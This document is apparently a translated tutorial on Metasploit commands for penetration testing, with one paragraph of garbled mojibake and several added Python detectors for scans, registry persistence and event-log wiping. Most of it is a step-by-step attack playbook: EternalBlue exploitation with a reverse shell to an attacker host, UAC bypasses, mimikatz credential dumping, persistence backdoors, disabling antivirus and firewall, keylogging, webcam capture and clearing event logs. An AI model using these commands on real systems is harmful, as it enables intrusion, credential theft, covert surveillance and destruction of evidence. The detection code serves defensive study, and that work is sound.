Editor's pick:
This article is from FreeBuf. It mainly introduces the MSF commands used most often during penetration tests and shows how MSF's attack modules are used to exploit vulnerabilities. We hope it helps your studies.

ÔÚÉøÍ¸¹ý³ÌÖУ¬MSF©¶´ÀûÓÃÉñÆ÷ÊDz»¿É»òȱµÄ¡£¸üºÎ¿öËüÊÇÒ»¸öÃâ·ÑµÄ¡¢¿ÉÏÂÔØµÄ¿ò¼Ü£¬Í¨¹ýËü¿ÉÒÔºÜÈÝÒ׵ػñÈ¡¡¢¿ª·¢²¢¶Ô¼ÆËã»úÈí¼þ©¶´ÊµÊ©¹¥»÷¡£Ëü±¾Éí¸½´øÊý°Ù¸öÒÑÖªÈí¼þ©¶´µÄרҵ¼¶Â©¶´¹¥»÷¹¤¾ß¡£ÊÇÐÅÏ¢ÊÕ¼¯¡¢Â©¶´É¨Ã衢ȨÏÞÌáÉý¡¢ÄÚÍøÉøÍ¸µÈ¼¯³ÉµÄ¹¤¾ß¡£
ǰ²»¾ÃMSF´Ó4.7Éý¼¶µ½MSF5.0,ÆäÖиĽøÁËÊý¾Ý¿âµÄ´¦ÀíÂß¼£¬ÓÅ»¯ÁËmsfconsoleÖն˲Ù×÷£¬²¢½«PostgreSQL×÷Ϊһ¸öRESTful·þÎñµ¥¶ÀÔËÐС£´ËÍ⻹¼ÓÈëÒ»¸öWeb·þÎñ¿ò¼Ü£¬ÐµÄÃâɱģ¿é£¬ÓÅ»¯ÁË¿ØÖƹ¦Äܵȡ£
ÏÂÃæÐ¡°××ܽáÁËÒ»ÏÂÔÚÉøÍ¸²âÊÔÖУ¬Ê¹ÓÃÆµÂʽ϶àµÄMSFÃüÁ·ÖΪÒÔϼ¸¿éÀ´½²¡£

Information Gathering
Discovering live hosts on the target network segment:
The auxiliary modules can be used to gather information about the target segment, including which ports are open and which hosts are alive.
auxiliary/scanner/discovery/arp_sweep
auxiliary/scanner/smb/smb_version  live hosts with port 445 open
auxiliary/scanner/portscan/syn  port scan
auxiliary/scanner/telnet/telnet_version  telnet service scan
auxiliary/scanner/rdp/rdp_scanner  remote desktop service scan
auxiliary/scanner/ssh/ssh_version  SSH host scan
...

[Figure 1: scanning module information]
Normally, when we do not know the assets during a penetration test, we first scan the whole segment for live hosts and then gather information only about the hosts that are alive. This shortens the test and avoids blind probing; blind information gathering often sends the later stages of the test down the wrong path and fails to achieve the expected result.
Whether you are port scanning or probing for live hosts, you always set the target IP address with set rhosts <ip address>; when scanning a whole segment, also set the thread count with set threads <n> (choose it according to the situation).

Running run starts the live-host scan of the segment; it found 7 live servers. We can then gather further information about those hosts, for example probing whether sensitive ports such as 22, 445 and 3389 are open. One note here: in my (Xiaobai's) experience I usually do not scan the whole segment first, because that puts load on the target hosts; instead I scan directly for the high-risk ports associated with overflow vulnerabilities, and if one is present, privileges can be gained through that overflow, which is a shortcut. Conversely, for a full port scan I personally recommend nmap.

Next we probe for hosts in the segment with port 445 open. The scan found 3 such hosts, so in the later vulnerability-detection stage we can test them for the EternalBlue vulnerability.
use auxiliary/scanner/smb/smb_version
set rhosts 192.168.201.1/24 //set the target host range
set threads 30 //set the number of scanning threads
run //execute the scan


The commands for the other port-scanning modules used earlier are much the same. Next we look at the brute-force (login) modules. Kali ships with its own built-in wordlists, but you can of course use your own dictionary; use whichever is convenient.
Location of the built-in wordlists:
/usr/share/wordlists/metasploit/

Brute forcing is typically run against common services such as SSH, MySQL, MSSQL, Oracle, VNC and telnet:
auxiliary/scanner/mysql/mysql_login
auxiliary/scanner/mssql/mssql_login
auxiliary/scanner/ssh/ssh_login
...
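From the defender's side, the smb_version sweep above (a /24 on port 445 with 30 threads) and the *_login modules cycling a wordlist both stand out in connection logs: one source fanning out to many hosts on one port, or failing authentication repeatedly against one host. The following Python detector is an added example, not code from the original article; it parses a constructed log format and its thresholds are assumptions to tune per environment.

```python
import re
from collections import defaultdict

# Constructed line format (not a real product's log): "<epoch> <src> -> <dst>:<port> <event>"
LINE_RE = re.compile(r"^(\d+) (\S+) -> (\S+):(\d+) (\w+)$")

def parse(lines):
    """Return (ts, src, dst, port, event) tuples; malformed lines are skipped, not fatal."""
    events = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:
            ts, src, dst, port, ev = m.groups()
            events.append((int(ts), src, dst, int(port), ev))
    return events

def detect(lines, sweep_hosts=8, fail_attempts=6, window=60):
    """'sweep': one source touches >= sweep_hosts distinct hosts on one port within `window`
    seconds; 'bruteforce': one source logs >= fail_attempts AUTH_FAIL events against one
    host:port in that window. The thresholds are assumptions to tune per environment."""
    touched = defaultdict(list)  # (src, port) -> [(ts, dst)]
    fails = defaultdict(list)    # (src, dst, port) -> [ts]
    for ts, src, dst, port, ev in sorted(parse(lines)):
        touched[(src, port)].append((ts, dst))
        if ev == "AUTH_FAIL":
            fails[(src, dst, port)].append(ts)
    alerts = set()
    for (src, port), hits in touched.items():
        for i, (ts, _) in enumerate(hits):  # slide the window start over each hit
            if len({d for t, d in hits[i:] if t - ts <= window}) >= sweep_hosts:
                alerts.add(("sweep", src, port))
                break
    for (src, dst, port), times in fails.items():
        for i, ts in enumerate(times):
            if sum(1 for t in times[i:] if t - ts <= window) >= fail_attempts:
                alerts.add(("bruteforce", src, dst, port))
                break
    return sorted(alerts)

# Constructed sample: the MSF box 192.168.205.148 hits 30 hosts on 445 within two seconds
# (smb_version with 30 threads), then fails SSH logins against one host ten times (ssh_login);
# a file server's normal 445 traffic to a few clients spread over hours must not trip the rule.
SAMPLE_LOG = (
    [f"{1000 + i // 15} 192.168.205.148 -> 192.168.201.{i + 1}:445 SYN" for i in range(30)]
    + [f"{1100 + 2 * i} 192.168.205.148 -> 192.168.201.9:22 AUTH_FAIL" for i in range(10)]
    + [f"{2000 + 3600 * i} 192.168.201.2 -> 192.168.201.{50 + i}:445 SYN" for i in range(3)]
)

if __name__ == "__main__":
    print(detect(SAMPLE_LOG))
```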
Vulnerability Detection
From the earlier information gathering we know that three target hosts have port 445 open, so we can probe further for the EternalBlue vulnerability with the following commands.
When I ran a training session earlier, verifying this vulnerability against a locally built Windows Server 2008 R2 test box blue-screened it outright; the exact cause is unclear. So always assess a vulnerability's usability sensibly during a penetration test. The scan found one target host vulnerable to EternalBlue. Besides EternalBlue there are many other overflow vulnerabilities; they are not covered one by one here, as the principle is the same.
use auxiliary/scanner/smb/smb_ms17_010 //use the EternalBlue (MS17-010) detection module
show options //view the options that need to be set
set rhosts 192.168.205.1/24 //set the target IP range to scan
set threads 30 //set the number of scanning threads
run //start the scan


Exploitation
The detection stage showed that the target host 192.168.205.150 is vulnerable to EternalBlue, so we can use MSF's attack module to exploit it and see whether we get a shell on the target; with that foothold, the overflow vulnerability lets us scan the internal network laterally. Run the following commands:
use exploit/windows/smb/ms17_010_eternalblue //use the EternalBlue exploit module
set payload windows/meterpreter/reverse_tcp //set a payload so the attacking machine receives the session from the target
set rhosts 192.168.205.150 //set the target host address
set lhost 192.168.205.148 //set the address that receives the payload connection, here the MSF machine
set lport 5555 //set the listening port; choose any port that does not conflict with others
exploit //run the attack


Privilege Escalation
Once we have a shell from the target host, the first thing to check is whether the current user has administrator privileges; if not, we need to escalate. Kali's local privilege-escalation modules can be used for this. Below we show how to raise the current user's privileges by bypassing UAC locally, with the detailed commands and steps.
First, what exactly is UAC and how does it work?
1. What is UAC?
Microsoft's Windows Vista and Windows Server 2008 introduced a User Account Control architecture to prevent unintended system-wide changes, in a way that is predictable and requires very little user effort. It is a Windows security feature that helps prevent unauthorised modification of the operating system: UAC ensures that certain changes are made only with an administrator's authorisation. If the administrator does not allow the change, it is not performed and the Windows system stays unchanged.
2. How does UAC work?
UAC works by blocking programs from performing any task that involves system changes or specific privileged operations. Unless the process attempting the operation is running with administrator privileges, the operation cannot proceed. A program run as administrator gets more privileges because it is "elevated", unlike a program that is not run as administrator.
Some users have no administrator privileges, and without them they cannot run commands that require administrator rights, such as modifying the registry, creating users, reading administrator account passwords, or creating scheduled tasks and startup entries.
The most direct privilege-escalation command: getsystem
The prerequisite for bypassing UAC is that we have already obtained a meterpreter session on the target through an exploit. After obtaining meterpreter session 1, run the command that checks whether the session already has SYSTEM privileges. I will not demonstrate it directly here, just give the commands; practise them yourself, as practice makes perfect. We need to send the obtained session to the background by running background.

Method 1:
use exploit/windows/local/bypassuac //bypasses Windows UAC through process injection using a trusted publisher certificate; it spawns a second shell with the UAC flag turned off
set session 1 //use session 1
exploit //run the privilege-escalation attack
After it completes successfully, querying the current user's privileges again shows they have been raised to administrator. In my case the session was already running as administrator, so this prompt appeared instead.


Method 2: Windows privilege escalation bypassing UAC protection (memory injection)
This module bypasses Windows UAC through process injection using a trusted publisher certificate and spawns a second shell with the UAC flag turned off. Compared with the ordinary technique, this module uses reflective DLL injection and drops only the DLL payload binary rather than three separate binaries. However, the correct architecture must be selected (use x64 for SYSWOW64 systems as well). After running the following commands the current user's privileges become administrator.
use exploit/windows/local/bypassuac_fodhelper
set session 1
exploit
Method 3: COM handler hijacking
First, a description of the COM handler hijack. This module bypasses Windows UAC by creating COM handler registry entries in the HKCU hive. When certain higher-integrity processes are loaded, they reference these registry entries, which causes the process to load a user-controlled DLL. These DLLs contain the payload that elevates the session's privileges. The module modifies the registry entries but removes them after the payload has been invoked. It requires the payload's architecture and the operating system to match, but the architecture of the current low-privilege meterpreter session may differ. If EXE::Custom is specified, the payload should be started in a separate process and then call ExitProcess(). The module invokes the target binary through cmd.exe on the target, so if access to cmd.exe is restricted, the module will not work properly.
Commands:
use exploit/windows/local/bypassuac_comhijack
set session 1
exploit
Method 4: Eventvwr registry entry
First, a description of this module. It bypasses Windows UAC by hijacking a special key in the registry under the current user's hive and inserting a custom command that is invoked when Windows Event Viewer is started. It spawns a second shell with the UAC flag turned off. The module modifies the registry entry but removes it after the payload has been invoked. It does not require the payload's architecture and the operating system to match. If EXE::Custom is specified, the payload should be started in a separate process and then call ExitProcess().
use exploit/windows/local/bypassuac_eventvwr
set session 1
exploit
You can test the local privilege-escalation modules above yourself. Besides these there are other escalation methods, such as adding the user to a local group with incognito's add_localgroup_user, the ms13-081, ms15-051, ms16-032, MS16-016 and MS14-068 exploits, ms18_8120_win32k_privesc, and domain privilege escalation. In my internal penetration tests most customer servers turned out to run Windows Server 2003 or 2008; 2012 and 2016 are rare.
Internal Network Penetration
Now that the target's shell has called back and the user's privileges have been raised from low to administrator, the next step is internal-network penetration. It covers a wide area, so this section walks through the commonly used commands in detail.

cat //view a file's contents
getwd //view the current working directory
download //download a file to the local machine

Create a file 1.txt locally and upload it to the desktop of the target server:
upload /opt/1.txt <path on the target>

On the target host we create pass.txt with the content hello hack!!!!, then run download in MSF to pull pass.txt down to the attacking machine.

Command format: download <file on target> <local path>

ipconfig / ifconfig //view the target's IP addresses
arp -a //view all entries in the ARP cache
route //print the routing table
netstat -na //show all connections and listening ports
rdesktop -u <username> -p <password> //connect with rdesktop; the tool needs to be installed on Kali first. Once we have the administrator's account and password we can log in to the target host remotely from the local machine.


The routing information is especially useful to a penetration tester: the attacking machine is on the external network and the target host is on the internal network, so they cannot talk to each other directly. A route must be added to bring the attacking machine's traffic into the internal network; then we can sweep the internal network. This is the so-called internal-network proxy (pivot).
First obtain the network segments, then add the route; once added, the internal hosts can be scanned laterally.
run get_local_subnets //get the local network segments
run autoroute -s 192.168.205.1/24 //add a route
run autoroute -p //view the routing table
run autoroute -d -s 172.2.175.0 //delete a segment
run post/windows/gather/arp_scanner RHOSTS=7.7.7.0/24 //probe live hosts in that segment
meterpreter > background //send the session to the background
System information:
ps //view the target's process list
kill //kill a process
getuid //view the current user and privileges
pwd //view the current directory path (on the target)
sysinfo //view target host information, such as version details
shutdown //shut the host down (use with care)

Post modules are used a lot, for example to check whether the target is a virtual machine, which software is installed, which patches are applied, and so on. The post modules are not limited to those listed here; the curious can explore further.
run post/windows/gather/checkvm //check whether the target is a virtual machine
run post/windows/gather/enum_applications //list software installed on the target
run post/windows/gather/enum_patches //view the target's installed patches
run post/windows/gather/enum_domain //find the target's domain controller (my lab has none)
run post/windows/manage/killav //stop antivirus software
run post/windows/manage/enable_rdp //enable remote desktop on port 3389
run post/windows/gather/enum_logged_on_users //list users who have logged on to the host
run post/windows/gather/credentials/windows_autologin //grab the auto-logon username and password
run post/windows/manage/enable_rdp username=xxx password=xxx //add a remote desktop user (the user is also added to the Administrators group)


The load command loads extensions; the one used most in testing is the credential-dumping extension.
load mimikatz //load mimikatz to dump credentials, not limited to plaintext passwords and hashes
run hashdump //dump the users' password hashes
msv //retrieves hashes
ssp //retrieves plaintext credentials
wdigest //reads the plaintext account passwords held in memory
mimikatz_command -f samdump::hashes //dump user hashes
mimikatz_command -f handle::list //list application processes
mimikatz_command -f service::list //list services


Backdoor Persistence
Maintaining access
Persistence module
First look at the persistence module's options:
run persistence -h //view help
run persistence -U -i 5 -p 5555 -r 192.168.205.148
-U: start the backdoor automatically when the user logs on. This adds an entry under HKCU\Software\Microsoft\Windows\CurrentVersion\Run. This parameter is recommended.
-i: reverse-connection interval, in seconds
-p: reverse-connection port
-r: reverse-connection IP address
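The persistence -U option above and the registry-based UAC bypasses in the privilege-escalation section all write into the current user's hive: the Run key the article names, and per-user handler keys under HKCU\Software\Classes (the mscfile\shell\open\command and CLSID paths below are the documented locations for the Event Viewer and COM-handler techniques, not values taken from the article). The following Python triage over Sysmon-style registry events is an added example with constructed records, not code from the article; it assumes Sysmon is configured to log writes to those keys.

```python
import re

# Per-user registry locations the techniques in this article touch, matched as prefixes.
# The Run key is the one the article names for persistence -U; the two Classes paths are the
# documented locations the eventvwr and COM-handler UAC bypass modules plant their handlers in.
WATCHED = [
    ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", "run-key persistence"),
    ("HKCU\\Software\\Classes\\mscfile\\shell\\open\\command", "UAC bypass: Event Viewer handler"),
    ("HKCU\\Software\\Classes\\CLSID\\", "UAC bypass: per-user COM handler"),
]
# Sysmon records per-user keys as HKU\<SID>\...; fold that back to HKCU\... before matching.
_USER_HIVE = re.compile(r"^HKU\\S-1-5-21-[\d-]+\\", re.IGNORECASE)

def normalise(target):
    return _USER_HIVE.sub(lambda _: "HKCU\\", target)

def classify(event):
    """event: dict of Sysmon fields. Only IDs 12 (key created) and 13 (value set) are
    registry writes; anything else, or a write outside WATCHED, returns None."""
    if event.get("EventID") not in (12, 13):
        return None
    key = normalise(event["TargetObject"]).lower()
    for prefix, label in WATCHED:
        if key.startswith(prefix.lower()):
            return label
    return None

def audit(events):
    """(image, normalised key, label) for every event that lands on a watched location."""
    hits = []
    for e in events:
        label = classify(e)
        if label:
            hits.append((e["Image"], normalise(e["TargetObject"]), label))
    return hits

SID = "HKU\\S-1-5-21-111-222-333-1001\\"  # constructed user SID prefix
SAMPLE_EVENTS = [  # constructed Sysmon-style records, not real telemetry
    {"EventID": 13, "Image": "C:\\Windows\\System32\\cmd.exe",
     "TargetObject": SID + "Software\\Microsoft\\Windows\\CurrentVersion\\Run\\update"},
    {"EventID": 13, "Image": "C:\\Windows\\System32\\rundll32.exe",
     "TargetObject": SID + "Software\\Classes\\mscfile\\shell\\open\\command\\(Default)"},
    {"EventID": 12, "Image": "C:\\Users\\bob\\AppData\\Local\\Temp\\x.exe",
     "TargetObject": SID + "Software\\Classes\\CLSID\\{constructed-clsid}\\InprocServer32"},
    {"EventID": 13, "Image": "C:\\Program Files\\App\\app.exe",
     "TargetObject": SID + "Software\\App\\LastRun"},  # benign per-user setting, must not match
]
```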

Metsvc module:
This module is very simple to use. First look at the module's information:

Just run run metsvc; when the command finishes, the target host has a service named meterpreter with start type automatic.
Open another client and use the handler listener module to obtain the shell again; the listening port here is 31337.


Covering Tracks
During an intrusion some log traces are inevitably left behind; the following command wipes them:
clearev is the most direct command for deleting logs.
After running it, all event logs on the target host are deleted.

Other Commands
Besides the above, here is a collection of other useful commands:
run getgui -e //enable remote desktop
run getgui -u cmdback -p 123123 //add a user
run getgui -f 4446 -e //forward the target's port 3389 to local port 4446
netsh advfirewall set allprofiles state off //turn off the firewall
webcam_list //list webcams
webcam_stream //stream video from the webcam
webcam_chat //view the webcam interface
steal_token <PID> //attempt to steal the token of the given process
use incognito //load incognito (used to steal the target's tokens or impersonate users)
list_tokens -u //list available user tokens on the target
list_tokens -g //list available group tokens on the target
keyscan_start //start keystroke logging
keyscan_dump //show captured keystrokes
keyscan_stop //stop keystroke logging
run post/windows/gather/enum_chrome //collect Chrome cached data
run post/windows/gather/enum_firefox //collect Firefox cached data
run post/windows/gather/enum_ie //collect IE cached data
screenshot //take a screenshot
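The getgui -u / enable_rdp username= commands, run metsvc and clearev each leave a standard Windows event behind: 4720 (account created) and 4732 (member added to a local group) in the Security log, 7045 (service installed) in the System log, and 1102 or 104 when the Security or System log is cleared. This Python triage over constructed event records is an added example, not code from the article; it orders a host's events and reports how far along that sequence the host has got.

```python
from collections import defaultdict
# Standard Windows event IDs that record the actions this article's commands perform.
SIGNALS = {
    ("Security", 4720): ("account", "local account created"),
    ("Security", 4732): ("group", "member added to a local security group"),
    ("System", 7045): ("service", "new service installed"),
    ("Security", 1102): ("wipe", "Security log cleared"),
    ("System", 104): ("wipe", "System log cleared"),
}

def severity(rec, stage):
    """'high' where the details match this article's commands, otherwise 'medium'."""
    detail = rec["detail"].lower()
    if stage == "wipe":                                      # clearev
        return "high"
    if stage == "group" and "administrators" in detail:     # getgui -u / enable_rdp username=
        return "high"
    if stage == "service" and "meterpreter" in detail:      # run metsvc names its service so
        return "high"
    return "medium"

def triage(records):
    """records: dicts {log, id, time, host, detail}. Returns {host: [(time, severity, stage,
    description), ...]} in time order; events not in SIGNALS are ignored."""
    alerts = defaultdict(list)
    for rec in sorted(records, key=lambda r: r["time"]):
        hit = SIGNALS.get((rec["log"], rec["id"]))
        if hit:
            stage, desc = hit
            alerts[rec["host"]].append((rec["time"], severity(rec, stage), stage, desc))
    return dict(alerts)

def summary(host_alerts):
    """(ordered distinct stages reached, worst severity) for one host's alerts."""
    stages = []
    for _, _, stage, _ in host_alerts:
        if stage not in stages:
            stages.append(stage)
    worst = "high" if any(a[1] == "high" for a in host_alerts) else "medium"
    return stages, worst

SAMPLE = [  # constructed records, not real logs; cmdback is the user the article's getgui example adds
    {"log": "Security", "id": 4720, "time": 100, "host": "SRV01", "detail": "New account: cmdback"},
    {"log": "Security", "id": 4732, "time": 101, "host": "SRV01", "detail": "cmdback added to Administrators"},
    {"log": "System", "id": 7045, "time": 130, "host": "SRV01", "detail": "Service Name: meterpreter, auto start"},
    {"log": "Security", "id": 4624, "time": 140, "host": "SRV01", "detail": "Logon Type: 10"},
    {"log": "Security", "id": 1102, "time": 200, "host": "SRV01", "detail": "The audit log was cleared"},
    {"log": "System", "id": 7045, "time": 300, "host": "WS07", "detail": "Service Name: Print Helper"},
]
```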